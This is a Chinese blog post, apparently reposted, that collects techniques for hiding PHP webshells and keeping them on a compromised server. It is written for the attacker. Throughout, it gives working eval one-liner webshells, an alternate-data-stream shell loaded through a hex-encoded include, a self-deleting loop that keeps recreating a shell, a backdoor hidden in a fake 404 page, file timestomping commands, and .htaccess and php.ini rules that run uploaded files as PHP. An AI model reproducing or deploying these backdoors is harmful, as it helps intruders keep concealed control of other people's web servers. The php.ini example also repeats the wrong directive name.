PHP后门隐藏的一些技巧总结

吾爱主题 阅读:154 2021-10-28 15:11:00 评论:0

前言

如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。

1、隐藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。

?
1 attrib +s +a +h +r shell.php //隐藏shell.php文件

2、修改文件时间属性

当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。

?
1 2 3 4 5 6 //修改时间修改 Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12" //访问时间修改 Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12" //创建时间修改 Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令获取文件属性

?
1 Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某个文件夹下所有文件的创建和修改时间

?
1 powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隐藏文件内容

在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:

?
1 echo ^<?php @ eval ( $_POST [ 'chopper' ]);?^> > index.php:hidden.jpg

这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。

利用include函数,将index.php:hidden.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了。

?
1 <?php @ include (PACK( 'H*' , '696E6465782E7068703A68696464656E2E6A7067' ));?>

4、不死马

不死马会删除自身,以进程的形式循环创建隐蔽的后门。

?
1 2 3 4 5 6 7 8 9 10 <?php set_time_limit(0); ignore_user_abort(1); unlink( __FILE__ ); //删除自身 while (1) {   file_put_contents ( 'shell.php' , '<?php @eval($_GET[cmd]);?>' ); //创建shell.php,这里最好用免杀的一句话   sleep(10); //间隔时间 } ?>

处理方式最简单有效的办法,就是重启服务就可以删除webshell文件。

5、中间件后门

将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。

github项目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404页面隐藏后门

404页面主要用来提升用户体验,可用来隐藏后门文件。

?
1 2 3 4 5 6 7 8 9 10 11 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN" > <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace( "/[pageerror]/e" , $_POST [ 'error' ], "saft" ); header( 'HTTP/1.1 404 Not Found' ); ?>

7、利用 .htaccess 文件构成PHP后门

一般.htaccess可以用来留后门和针对黑名单绕过,在上传目录创建.htaccess 文件写入,无需重启即可生效,上传png文件解析。

?
1 AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析规则,把文件名包含1的解析成php,上传1.txt即可解析。

?
1 2 3 <FilesMatch "1" > SetHandler application/x-httpd-php </FilesMatch>

8、利用 php.ini 隐藏后门文件

php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门。

;在PHP文档之前自动添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件。
auto_prepend_file = "c:\tmp.txt"

需重启服务生效,访问任意一个php文件即可获取webshell。

总结

到此这篇关于PHP后门隐藏的一些技巧的文章就介绍到这了,更多相关PHP后门隐藏技巧内容请搜索服务器之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持服务器之家!

原文链接:https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448906266&idx=1&sn=f9bf831185248cb9d6297b91cfa73ea8

可以去百度分享获取分享代码输入这里。
声明

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

【腾讯云】云服务器产品特惠热卖中
搜索
标签列表
    关注我们

    了解等多精彩内容